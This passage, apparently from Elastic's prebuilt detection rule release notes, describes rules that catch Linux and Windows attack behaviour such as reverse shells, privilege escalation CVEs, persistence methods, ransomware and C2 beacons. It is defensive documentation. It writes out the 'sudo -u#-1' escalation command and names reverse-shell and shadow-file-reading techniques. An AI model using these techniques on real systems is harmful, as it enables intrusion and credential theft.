| update | 4 + +|<<prebuilt-rule-8-10-5-esxi-discovery-via-grep, ESXI Discovery via Grep>> | Identifies instances where a process named 'grep', 'egrep', or 'pgrep' is started on a Linux system with arguments related to virtual machine (VM) files, such as "vmdk", "vmx", "vmxf", "vmsd", "vmsn", "vswp", "vmss", "nvram", or "vmem". These file extensions are associated with VM-related file formats, and their presence in grep command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM files on the system. | update | 4 + +|<<prebuilt-rule-8-10-5-enumeration-of-kernel-modules, Enumeration of Kernel Modules>> | Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module. | update | 206 + +|<<prebuilt-rule-8-10-5-hping-process-activity, Hping Process Activity>> | Hping ran on a Linux host. Hping is a FOSS command-line packet analyzer and has the ability to construct network packets for a wide variety of network security testing applications, including scanning and firewall auditing. | update | 106 + +|<<prebuilt-rule-8-10-5-nping-process-activity, Nping Process Activity>> | Nping ran on a Linux host. Nping is part of the Nmap tool suite and has the ability to construct raw packets for a wide variety of security testing applications, including denial of service testing. | update | 106 + +|<<prebuilt-rule-8-10-5-potential-pspy-process-monitoring-detected, Potential Pspy Process Monitoring Detected>> | This rule leverages auditd to monitor for processes scanning different processes within the /proc directory using the openat syscall. This is a strong indication for the usage of the pspy utility. 
Attackers may leverage the pspy process monitoring utility to monitor system processes without requiring root permissions, in order to find potential privilege escalation vectors. | update | 3 + +|<<prebuilt-rule-8-10-5-sudo-command-enumeration-detected, Sudo Command Enumeration Detected>> | This rule monitors for the usage of the sudo -l command, which is used to list the allowed and forbidden commands for the invoking user. Attackers may execute this command to enumerate commands allowed to be executed with sudo permissions, potentially allowing to escalate privileges to root. | update | 3 + +|<<prebuilt-rule-8-10-5-suid-sguid-enumeration-detected, SUID/SGUID Enumeration Detected>> | This rule monitors for the usage of the "find" command in conjunction with SUID and SGUID permission arguments. SUID (Set User ID) and SGID (Set Group ID) are special permissions in Linux that allow a program to execute with the privileges of the file owner or group, respectively, rather than the privileges of the user running the program. In case an attacker is able to enumerate and find a binary that is misconfigured, they might be able to leverage this misconfiguration to escalate privileges by exploiting vulnerabilities or built-in features in the privileged program. | update | 3 + +|<<prebuilt-rule-8-10-5-unusual-user-privilege-enumeration-via-id, Unusual User Privilege Enumeration via id>> | This rule monitors for a sequence of 20 "id" command executions within 1 second by the same parent process. This behavior is unusual, and may be indicative of the execution of an enumeration script such as LinPEAS or LinEnum. These scripts leverage the "id" command to enumerate the privileges of all users present on the system. | update | 2 + +|<<prebuilt-rule-8-10-5-virtual-machine-fingerprinting, Virtual Machine Fingerprinting>> | An adversary may attempt to get detailed information about the operating system and hardware. 
This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware. | update | 106 + +|<<prebuilt-rule-8-10-5-abnormal-process-id-or-lock-file-created, Abnormal Process ID or Lock File Created>> | Identifies the creation of a Process ID (PID), lock or reboot file created in temporary file storage paradigm (tmpfs) directory /var/run. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. | update | 210 + +|<<prebuilt-rule-8-10-5-potential-curl-cve-2023-38545-exploitation, Potential curl CVE-2023-38545 Exploitation>> | Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule. | update | 2 + +|<<prebuilt-rule-8-10-5-file-creation-execution-and-self-deletion-in-suspicious-directory, File Creation, Execution and Self-Deletion in Suspicious Directory>> | This rule monitors for the creation of a file, followed by its execution and self-deletion in a short timespan within a directory often used for malicious purposes by threat actors. This behavior is often used by malware to execute malicious code and delete itself to hide its tracks. 
| update | 2 + +|<<prebuilt-rule-8-10-5-file-transfer-or-listener-established-via-netcat, File Transfer or Listener Established via Netcat>> | A netcat process is engaging in network activity on a Linux host. Netcat is often used as a persistence mechanism by exporting a reverse shell or by serving a shell on a listening port. Netcat is also sometimes used for data exfiltration. | update | 108 + +|<<prebuilt-rule-8-10-5-network-connection-via-recently-compiled-executable, Network Connection via Recently Compiled Executable>> | This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent network connection event. This behavior can indicate the set up of a reverse tcp connection to a command-and-control server. Attackers may spawn reverse shells to establish persistence onto a target system. | update | 2 + +|<<prebuilt-rule-8-10-5-interactive-terminal-spawned-via-perl, Interactive Terminal Spawned via Perl>> | Identifies when a terminal (tty) is spawned via Perl. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. | update | 106 + +|<<prebuilt-rule-8-10-5-process-started-from-process-id-pid-file, Process Started from Process ID (PID) File>> | Identifies a new process starting from a process ID (PID), lock or reboot file within the temporary file storage paradigm (tmpfs) directory /var/run directory. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. | update | 107 + +|<<prebuilt-rule-8-10-5-binary-executed-from-shared-memory-directory, Binary Executed from Shared Memory Directory>> | Identifies the execution of a binary by root in Linux shared memory directories: (/dev/shm/, /run/shm/, /var/run/, /var/lock/). 
This activity is to be considered highly abnormal and should be investigated. Threat actors have placed executables used for persistence on high-uptime servers in these directories as system backdoors. | update | 107 + +|<<prebuilt-rule-8-10-5-interactive-terminal-spawned-via-python, Interactive Terminal Spawned via Python>> | Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-code-execution-via-postgresql, Potential Code Execution via Postgresql>> | This rule monitors for suspicious activities that may indicate an attacker attempting to execute arbitrary code within a PostgreSQL environment. Attackers can execute code via PostgreSQL as a result of gaining unauthorized access to a public facing PostgreSQL database or exploiting vulnerabilities, such as remote command execution and SQL injection attacks, which can result in unauthorized access and malicious actions, and facilitate post-exploitation activities for unauthorized access and malicious actions. | update | 4 + +|<<prebuilt-rule-8-10-5-linux-restricted-shell-breakout-via-linux-binary-s, Linux Restricted Shell Breakout via Linux Binary(s)>> | Identifies the abuse of a Linux binary to break out of a restricted shell or environment by spawning an interactive system shell. The activity of spawning a shell from a binary is not common behavior for a user or system administrator, and may indicate an attempt to evade detection, increase capabilities or enhance the stability of an adversary. | update | 110 + +|<<prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process, Deprecated - Potential Reverse Shell via Suspicious Parent Process>> | This detection rule detects the creation of a shell through a suspicious parent child relationship. 
Any reverse shells spawned by the specified utilities that use a forked process to initialize the connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. | update | 5 + +|<<prebuilt-rule-8-10-5-potential-reverse-shell-via-background-process, Potential Reverse Shell via Background Process>> | Monitors for the execution of background processes with process arguments capable of opening a socket in the /dev/tcp channel. This may indicate the creation of a backdoor reverse connection, and should be investigated further. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-reverse-shell-via-java, Potential Reverse Shell via Java>> | This detection rule identifies the execution of a Linux shell process from a Java JAR application post an incoming network connection. This behavior may indicate reverse shell activity via a Java application. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-child-process, Potential Reverse Shell via Suspicious Child Process>> | This detection rule detects the creation of a shell through a suspicious process chain. Any reverse shells spawned by the specified utilities that are initialized from a single process followed by a network connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. | update | 5 + +|<<prebuilt-rule-8-10-5-potential-meterpreter-reverse-shell, Potential Meterpreter Reverse Shell>> | This detection rule identifies a sample of suspicious Linux system file reads used for system fingerprinting, leveraged by the Metasploit Meterpreter shell to gather information about the target that it is executing its shell on. Detecting this pattern is indicative of a successful meterpreter shell connection. 
| update | 2 + +|<<prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-binary, Potential Reverse Shell via Suspicious Binary>> | This detection rule detects the creation of a shell through a chain consisting of the execution of a suspicious binary (located in a commonly abused location or executed manually) followed by a network event and ending with a shell being spawned. Stageless reverse tcp shells display this behaviour. Attackers may spawn reverse shells to establish persistence onto a target system. | update | 5 + +|<<prebuilt-rule-8-10-5-potential-reverse-shell, Potential Reverse Shell>> | This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a parent-child relationship where a network event is followed by the creation of a shell process. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system. | update | 5 + +|<<prebuilt-rule-8-10-5-potential-reverse-shell-via-udp, Potential Reverse Shell via UDP>> | This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly. | update | 2 + +|<<prebuilt-rule-8-10-5-suspicious-content-extracted-or-decompressed-via-funzip, Suspicious Content Extracted or Decompressed via Funzip>> | Identifies when suspicious content is extracted from a file and subsequently decompressed using the funzip utility. Malware may execute the tail utility using the "-c" option to read a sequence of bytes from the end of a file. The output from tail can be piped to funzip in order to decompress malicious code before it is executed. 
This behavior is consistent with malware families such as Bundlore. | update | 3 + +|<<prebuilt-rule-8-10-5-suspicious-system-commands-executed-by-previously-unknown-executable, Suspicious System Commands Executed by Previously Unknown Executable>> | This rule monitors for the execution of several commonly used system commands executed by a previously unknown executable located in commonly abused directories. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to run malicious code. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. | update | 103 + +|<<prebuilt-rule-8-10-5-suspicious-mining-process-creation-event, Suspicious Mining Process Creation Event>> | Identifies service creation events of common mining services, possibly indicating the infection of a system with a cryptominer. | update | 4 + +|<<prebuilt-rule-8-10-5-bpf-filter-applied-using-tc, BPF filter applied using TC>> | Detects when the tc (transmission control) binary is utilized to set a BPF (Berkeley Packet Filter) on a network interface. Tc is used to configure Traffic Control in the Linux kernel. It can shape, schedule, police and drop traffic. A threat actor can utilize tc to set a bpf filter on an interface for the purpose of manipulating the incoming traffic. This technique is not at all common and should indicate abnormal, suspicious or malicious activity. | update | 106 + +|<<prebuilt-rule-8-10-5-suspicious-data-encryption-via-openssl-utility, Suspicious Data Encryption via OpenSSL Utility>> | Identifies when the openssl command-line utility is used to encrypt multiple files on a host within a short time window. 
Adversaries may encrypt data on a single or multiple systems in order to disrupt the availability of their target's data and may attempt to hold the organization's data to ransom for the purposes of extortion. | update | 3 + +|<<prebuilt-rule-8-10-5-suspicious-termination-of-esxi-process, Suspicious Termination of ESXI Process>> | Identifies instances where VMware processes, such as "vmware-vmx" or "vmx," are terminated on a Linux system by a "kill" command. The rule monitors for the "end" event type, which signifies the termination of a process. The presence of a "kill" command as the parent process for terminating VMware processes may indicate that a threat actor is attempting to interfere with the virtualized environment on the targeted system. | update | 4 + +|<<prebuilt-rule-8-10-5-suspicious-file-changes-activity-detected, Suspicious File Changes Activity Detected>> | This rule identifies a sequence of 100 file extension rename events within a set of common file paths by the same process in a timespan of 1 second. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. | update | 6 + +|<<prebuilt-rule-8-10-5-potential-linux-ransomware-note-creation-detected, Potential Linux Ransomware Note Creation Detected>> | This rule identifies a sequence of a mass file encryption event in conjunction with the creation of a .txt file with a file name containing ransomware keywords executed by the same process in a 1 second timespan. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. 
| update | 6 + +|<<prebuilt-rule-8-10-5-high-number-of-process-terminations, High Number of Process Terminations>> | This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period. | update | 109 + +|<<prebuilt-rule-8-10-5-connection-to-external-network-via-telnet, Connection to External Network via Telnet>> | Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to publicly routable IP addresses. | update | 105 + +|<<prebuilt-rule-8-10-5-connection-to-internal-network-via-telnet, Connection to Internal Network via Telnet>> | Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to non-publicly routable IP addresses. | update | 105 + +|<<prebuilt-rule-8-10-5-chkconfig-service-add, Chkconfig Service Add>> | Detects the use of the chkconfig binary to manually add a service for management by chkconfig. Threat actors may utilize this technique to maintain persistence on a system. When a new service is added, chkconfig ensures that the service has either a start or a kill entry in every runlevel and when the system is rebooted the service file added will run providing long-term persistence. | update | 107 + +|<<prebuilt-rule-8-10-5-modification-of-openssh-binaries, Modification of OpenSSH Binaries>> | Adversaries may modify SSH related binaries for persistence or credential access by patching sensitive functions to enable unauthorized access or by logging SSH credentials for exfiltration. | update | 106 + +|<<prebuilt-rule-8-10-5-cron-job-created-or-changed-by-previously-unknown-process, Cron Job Created or Changed by Previously Unknown Process>> | Linux cron jobs are scheduled tasks that can be leveraged by malicious actors for persistence, privilege escalation and command execution. 
By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. | update | 5 + +|<<prebuilt-rule-8-10-5-dynamic-linker-copy, Dynamic Linker Copy>> | Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. | update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-file-creation-in-etc-for-persistence, Suspicious File Creation in /etc for Persistence>> | Detects the manual creation of files in specific etc directories, via user root, used by Linux malware to persist and elevate privileges on compromised systems. File creation in these directories should not be entirely common and could indicate a malicious binary or script installing persistence mechanisms for long term access. | update | 109 + +|<<prebuilt-rule-8-10-5-potential-persistence-through-init-d-detected, Potential Persistence Through init.d Detected>> | Files that are placed in the /etc/init.d/ directory in Unix can be used to start custom applications, services, scripts or commands during start-up. Init.d has been mostly replaced in favor of Systemd. However, the "systemd-sysv-generator" can convert init.d files to service unit files that run at boot. Adversaries may add or alter files located in the /etc/init.d/ directory to execute malicious code upon boot in order to gain persistence on the system. | update | 6 + +|<<prebuilt-rule-8-10-5-kernel-module-load-via-insmod, Kernel Module Load via insmod>> | Detects the use of the insmod binary to load a Linux kernel object file. 
Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspcious or malicious behavior. | update | 106 + +|<<prebuilt-rule-8-10-5-persistence-via-kde-autostart-script-or-desktop-file-modification, Persistence via KDE AutoStart Script or Desktop File Modification>> | Identifies the creation or modification of a K Desktop Environment (KDE) AutoStart script or desktop file that will execute upon each user logon. Adversaries may abuse this method for persistence. | update | 107 + +|<<prebuilt-rule-8-10-5-potential-linux-backdoor-user-account-creation, Potential Linux Backdoor User Account Creation>> | Identifies the attempt to create a new backdoor user by setting the user's UID to 0. Attackers may alter a user's UID to 0 to establish persistence on a system. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-remote-code-execution-via-web-server, Potential Remote Code Execution via Web Server>> | Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. Attackers may exploit a vulnerability in a web application to execute commands via a web server, or place a backdoor file that can be abused to gain code execution as a mechanism for persistence. | update | 5 + +|<<prebuilt-rule-8-10-5-linux-user-added-to-privileged-group, Linux User Added to Privileged Group>> | Identifies attempts to add a user to a privileged group. Attackers may add users to a privileged group in order to establish persistence on a system. 
| update | 4 + +|<<prebuilt-rule-8-10-5-potential-persistence-through-motd-file-creation-detected, Potential Persistence Through MOTD File Creation Detected>> | Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the creation of potentially malicious files within the default MOTD file directories. | update | 6 + +|<<prebuilt-rule-8-10-5-suspicious-process-spawned-from-motd-detected, Suspicious Process Spawned from MOTD Detected>> | Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the execution of potentially malicious processes through the MOTD utility. | update | 6 + +|<<prebuilt-rule-8-10-5-potential-persistence-through-run-control-detected, Potential Persistence Through Run Control Detected>> | This rule monitors the creation/alteration of the rc.local file by a previously unknown process executable through the use of the new terms rule type. The /etc/rc.local file is used to start custom applications, services, scripts or commands during start-up. 
The rc.local file has mostly been replaced by Systemd. However, through the "systemd-rc-local-generator", rc.local files can be converted to services that run at boot. Adversaries may alter rc.local to execute malicious code at start-up, and gain persistence onto the system. | update | 107 + +|<<prebuilt-rule-8-10-5-shared-object-created-or-changed-by-previously-unknown-process, Shared Object Created or Changed by Previously Unknown Process>> | This rule monitors the creation of shared object files by previously unknown processes. The creation of a shared object file involves compiling code into a dynamically linked library that can be loaded by other programs at runtime. While this process is typically used for legitimate purposes, malicious actors can leverage shared object files to execute unauthorized code, inject malicious functionality into legitimate processes, or bypass security controls. This allows malware to persist on the system, evade detection, and potentially compromise the integrity and confidentiality of the affected system and its data. | update | 4 + +|<<prebuilt-rule-8-10-5-new-systemd-timer-created, New Systemd Timer Created>> | Detects the creation of a systemd timer within any of the default systemd timer directories. Systemd timers can be used by an attacker to gain persistence, by scheduling the execution of a command or script. Similarly to cron/at, systemd timers can be set up to execute on boot time, or on a specific point in time, which allows attackers to regain access in case the connection to the infected asset was lost. | update | 6 + +|<<prebuilt-rule-8-10-5-new-systemd-service-created-by-previously-unknown-process, New Systemd Service Created by Previously Unknown Process>> | Systemd service files are configuration files in Linux systems used to define and manage system services. 
Malicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection. | update | 5 + +|<<prebuilt-rule-8-10-5-potential-unauthorized-access-via-wildcard-injection-detected, Potential Unauthorized Access via Wildcard Injection Detected>> | This rule monitors for the execution of the "chown" and "chmod" commands with command line flags that could indicate a wildcard injection attack. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-container-misconfiguration, Potential Privilege Escalation via Container Misconfiguration>> | This rule monitors for the execution of processes that interact with Linux containers through an interactive shell without root permissions. Utilities such as runc and ctr are universal command-line utilities leveraged to interact with containers via root permissions. On systems where the access to these utilities are misconfigured, attackers might be able to create and run a container that mounts the root folder or spawn a privileged container vulnerable to a container escape attack, which might allow them to escalate privileges and gain further access onto the host file system. | update | 3 + +|<<prebuilt-rule-8-10-5-modification-of-dynamic-linker-preload-shared-object, Modification of Dynamic Linker Preload Shared Object>> | Identifies modification of the dynamic linker preload shared object (ld.so.preload). Adversaries may execute malicious payloads by hijacking the dynamic linker used to load libraries. 
| update | 207 + +|<<prebuilt-rule-8-10-5-suspicious-symbolic-link-created, Suspicious Symbolic Link Created>> | Identifies the creation of a symbolic link to a suspicious file or location. A symbolic link is a reference to a file or directory that acts as a pointer or shortcut, allowing users to access the target file or directory from a different location in the file system. An attacker can potentially leverage symbolic links for privilege escalation by tricking a privileged process into following the symbolic link to a sensitive file, giving the attacker access to data or capabilities they would not normally have. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-uid-int-max-bug-detected, Potential Privilege Escalation via UID INT_MAX Bug Detected>> | This rule monitors for the execution of the systemd-run command by a user with a UID that is larger than the maximum allowed UID size (INT_MAX). Some older Linux versions were affected by a bug which allows user accounts with a UID greater than INT_MAX to escalate privileges by spawning a shell through systemd-run. | update | 3 + +|<<prebuilt-rule-8-10-5-kernel-load-or-unload-via-kexec-detected, Kernel Load or Unload via Kexec Detected>> | This detection rule identifies the usage of kexec, helping to uncover unauthorized kernel replacements and potential compromise of the system's integrity. Kexec is a Linux feature that enables the loading and execution of a different kernel without going through the typical boot process. Malicious actors can abuse kexec to bypass security measures, escalate privileges, establish persistence or hide their activities by loading a malicious kernel, enabling them to tamper with the system's trusted state, allowing e.g. a VM Escape. 
| update | 4 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-cve-2023-4911, Potential Privilege Escalation via CVE-2023-4911>> | This rule detects potential privilege escalation attempts through Looney Tunables (CVE-2023-4911). Looney Tunables is a buffer overflow vulnerability in GNU C Library's dynamic loader's processing of the GLIBC_TUNABLES environment variable. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-overlayfs, Potential Privilege Escalation via OverlayFS>> | Identifies an attempt to exploit a local privilege escalation (CVE-2023-2640 and CVE-2023-32629) via a flaw in Ubuntu's modifications to OverlayFS. These flaws allow the creation of specialized executables, which, upon execution, grant the ability to escalate privileges to root on the affected machine. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-pkexec, Potential Privilege Escalation via PKEXEC>> | Identifies an attempt to exploit a local privilege escalation in polkit pkexec (CVE-2021-4034) via unsecure environment variable injection. Successful exploitation allows an unprivileged user to escalate to the root user. | update | 106 + +|<<prebuilt-rule-8-10-5-potential-shell-via-wildcard-injection-detected, Potential Shell via Wildcard Injection Detected>> | This rule monitors for the execution of a set of linux binaries, that are potentially vulnerable to wildcard injection, with suspicious command line flags followed by a shell spawn event. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. 
| update | 3 + +|<<prebuilt-rule-8-10-5-potential-suspicious-debugfs-root-device-access, Potential Suspicious DebugFS Root Device Access>> | This rule monitors for the usage of the built-in Linux DebugFS utility to access a disk device without root permissions. Linux users that are part of the "disk" group have sufficient privileges to access all data inside of the machine through DebugFS. Attackers may leverage DebugFS in conjunction with "disk" permissions to read sensitive files owned by root, such as the shadow file, root ssh private keys or other sensitive files that may allow them to further escalate privileges. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-shadow-file-read-via-command-line-utilities, Potential Shadow File Read via Command Line Utilities>> | Identifies access to the /etc/shadow file via the commandline using standard system utilities. After elevating privileges to root, threat actors may attempt to read or dump this file in order to gain valid credentials. They may utilize these to move laterally undetected and access additional resources. | update | 107 + +|<<prebuilt-rule-8-10-5-potential-sudo-privilege-escalation-via-cve-2019-14287, Potential Sudo Privilege Escalation via CVE-2019-14287>> | This rule monitors for the execution of a suspicious sudo command that is leveraged in CVE-2019-14287 to escalate privileges to root. Sudo does not verify the presence of the designated user ID and proceeds to execute using a user ID that can be chosen arbitrarily. By using the sudo privileges, the command "sudo -u#-1" translates to an ID of 0, representing the root user. This exploit may work for sudo versions prior to v1.28. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-sudo-hijacking-detected, Potential Sudo Hijacking Detected>> | Identifies the creation of a sudo binary located at /usr/bin/sudo. 
Attackers may hijack the default sudo binary and replace it with a custom binary or script that can read the user's password in clear text to escalate privileges or enable persistence onto the system every time the sudo binary is executed. | update | 103 + +|<<prebuilt-rule-8-10-5-potential-sudo-token-manipulation-via-process-injection, Potential Sudo Token Manipulation via Process Injection>> | This rule detects potential sudo token manipulation attacks through process injection by monitoring the use of a debugger (gdb) process followed by a successful uid change event during the execution of the sudo process. A sudo token manipulation attack is performed by injecting into a process that has a valid sudo token, which can then be used by attackers to activate their own sudo token. This attack requires ptrace to be enabled in conjunction with the existence of a living process that has a valid sudo token with the same uid as the current user. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-recently-compiled-executable, Potential Privilege Escalation via Recently Compiled Executable>> | This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent alteration of UID permissions to root privileges. This behavior can potentially indicate the execution of a kernel or software privilege escalation exploit. | update | 2 + +|<<prebuilt-rule-8-10-5-namespace-manipulation-using-unshare, Namespace Manipulation Using Unshare>> | Identifies suspicious usage of unshare to manipulate system namespaces. Unshare can be utilized to escalate privileges or escape container security boundaries. Threat actors have utilized this binary to allow themselves to escape to the host and access other resources or escalate privileges. 
| update | 7 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-through-writable-docker-socket, Potential Privilege Escalation through Writable Docker Socket>> | This rule monitors for the usage of Docker runtime sockets to escalate privileges on Linux systems. Docker sockets by default are only be writable by the root user and docker group. Attackers that have permissions to write to these sockets may be able to create and run a container that allows them to escalate privileges and gain further access onto the host file system. | update | 3 + +|<<prebuilt-rule-8-10-5-cobalt-strike-command-and-control-beacon, Cobalt Strike Command and Control Beacon>> | Cobalt Strike is a threat emulation platform commonly modified and used by adversaries to conduct network attack and exploitation campaigns. This rule detects a network activity algorithm leveraged by Cobalt Strike implant beacons for command and control. | update | 105 + +|<<prebuilt-rule-8-10-5-possible-fin7-dga-command-and-control-behavior, Possible FIN7 DGA Command and Control Behavior>> | This rule detects a known command and control pattern in network events. The FIN7 threat group is known to use this command and control technique, while maintaining persistence in their target's network. | update | 104 + +|<<prebuilt-rule-8-10-5-halfbaked-command-and-control-beacon, Halfbaked Command and Control Beacon>> | Halfbaked is a malware family used to establish persistence in a contested network. This rule detects a network activity algorithm leveraged by Halfbaked implant beacons for command and control. | update | 104 + +|<<prebuilt-rule-8-10-5-potential-network-sweep-detected, Potential Network Sweep Detected>> | This rule identifies a potential network sweep. A network sweep is a method used by attackers to scan a target network, identifying active hosts, open ports, and available services to gather information on vulnerabilities and weaknesses. 
This reconnaissance helps them plan subsequent attacks and exploit potential entry points for unauthorized access, data theft, or other malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination hosts on commonly used network services. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-network-scan-detected, Potential Network Scan Detected>> | This rule identifies a potential port scan. A port scan is a method utilized by attackers to systematically scan a target system or network for open ports, allowing them to identify available services and potential vulnerabilities. By mapping out the open ports, attackers can gather critical information to plan and execute targeted attacks, gaining unauthorized access, compromising security, and potentially leading to data breaches, unauthorized control, or further exploitation of the targeted system or network. This rule proposes threshold logic to check for connection attempts from one source host to 20 or more destination ports. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-syn-based-network-scan-detected, Potential SYN-Based Network Scan Detected>> | This rule identifies a potential SYN-Based port scan. A SYN port scan is a technique employed by attackers to scan a target network for open ports by sending SYN packets to multiple ports and observing the response. Attackers use this method to identify potential entry points or services that may be vulnerable to exploitation, allowing them to launch targeted attacks or gain unauthorized access to the system or network, compromising its security and potentially leading to data breaches or further malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination ports using 2 or less packets per port. 
| update | 4 + +|<<prebuilt-rule-8-10-5-inbound-connection-to-an-unsecure-elasticsearch-node, Inbound Connection to an Unsecure Elasticsearch Node>> | Identifies Elasticsearch nodes that do not have Transport Layer Security (TLS), and/or lack authentication, and are accepting inbound network connections over the default Elasticsearch port. | update | 104 + +|<<prebuilt-rule-8-10-5-exporting-exchange-mailbox-via-powershell, Exporting Exchange Mailbox via PowerShell>> | Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. | update | 108 + +|<<prebuilt-rule-8-10-5-exchange-mailbox-export-via-powershell, Exchange Mailbox Export via PowerShell>> | Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. | update | 6 + +|<<prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities, PowerShell Suspicious Script with Audio Capture Capabilities>> | Detects PowerShell scripts that can record audio, a common feature in popular post-exploitation tooling. | update | 108 + +|<<prebuilt-rule-8-10-5-powershell-keylogging-script, PowerShell Keylogging Script>> | Detects the use of Win32 API Functions that can be used to capture user keystrokes in PowerShell scripts. Attackers use this technique to capture user input, looking for credentials and/or other valuable data. | update | 110 + +|<<prebuilt-rule-8-10-5-encrypting-files-with-winrar-or-7z, Encrypting Files with WinRar or 7z>> | Identifies use of WinRar or 7z to create an encrypted files. Adversaries will often compress and encrypt data in preparation for exfiltration. 
